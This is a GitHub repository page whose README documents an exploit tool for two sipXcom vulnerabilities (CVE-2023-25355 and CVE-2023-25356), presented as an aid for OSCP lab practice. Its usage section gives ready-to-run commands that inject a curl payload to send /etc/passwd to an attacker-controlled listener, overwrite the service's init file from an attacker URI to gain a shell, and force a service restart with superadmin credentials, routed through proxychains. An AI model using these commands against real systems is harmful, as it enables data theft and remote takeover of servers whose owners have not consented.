Skip to content
/ CVE-2023-25355-25356 Public

CVE-2023-25355 and CVE-2023-25356 with automated service reload

1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

glefait/CVE-2023-25355-25356

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
src
src
 
 
.gitignore
.gitignore
 
 
.pre-commit-config.yaml
.pre-commit-config.yaml
 
 
README.md
README.md
 
 
poetry.lock
poetry.lock
 
 
pyproject.toml
pyproject.toml
 
 

Repository files navigation

Exploit and credits

The exploit was found by [email protected] and is presented both in two amazing pieces:

A repo to automate even more this vulnerability has been published by Alex Linov:

Objective

The CVE-2023-25355 is an exfiltration mecanism where files on the sipXcom server are uploaded on a webserver controlled by the attacker.

The CVE-2023-25356 is an extension of the first vulnerability where files controlled by the attacker can be written on the sipXcom server filesystem. Because the sipXcom service is able to overwrite its own init configuration, a shell can therefore be obtained easily as soon as the service is restarted.

The interesting point to note here is that the sipXcom superadmin user is able to restart this service. Therefore the aim of this package is to fully automatize the restart of this service.

but why fully automating it ?

To prepare OSCP, there are labs with machines to pwn.

In one specific lab, a machine subject to this vulnerability is/was quite instable, meaning you had sometimes to start and revert the lab several times. This is annoying. Once automated, this is less annoying.

Requirements

You need:

  • a webserver accessible from the target that is able to serve and/or receive files.
  • python and poetry

Usage

Install

poetry install

Then you can either run the tool from active the environment, run it from the directory or elsewhere with the name of the CVE:

# if the poetry environment is active (poetry shell)
cve_2023_25355 --help

# otherwise, from the current directory
poetry run cve_2023_25355 --help

# otherwise from another directory
poetry -C /shared/tools/CVE/CVE-2023-25355 run cve_2023_25355 --help

CVE-2023-25355

In the following example, we send a payload to exfiltrate the /etc/passwd file that will be uploaded to a controlled http listener.

cve_2023_25355 \
    --xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
    --xmpp-server-address 1.2.3.4 \
    --payload '--data-binary @/etc/passwd http://ATTACKER-WEB-LISTENER/some_path'

CVE-2023-25356

In the following example, we send a payload to overwrite the /etc/init.d/openfire with the content of the provided URI.

cve_2023_25356 \
    --xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
    --xmpp-server-address 1.2.3.4 \
    --sipxcom-init-file-source-uri 'http://ATTACKER-WEB-LISTENER/my-offensive-sipx-config'

Then, if we know the superadmin password, we can restart the service to reload the config and trigger any gadget.

run sipxcom_service_restart \
    --sipxcom-superuser-username superadmin \
    --sipxcom-superuser-password superadmin_password \
    --sipxcom-website https://1.2.3.4/
    --debug-local-directory /tmp

Combined with proxychains

./proxychains4 -f proxychains.conf cve_2023_25355 [...] --xmpp-server-address 172.1.2.3

Project:

About

CVE-2023-25355 and CVE-2023-25356 with automated service reload

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages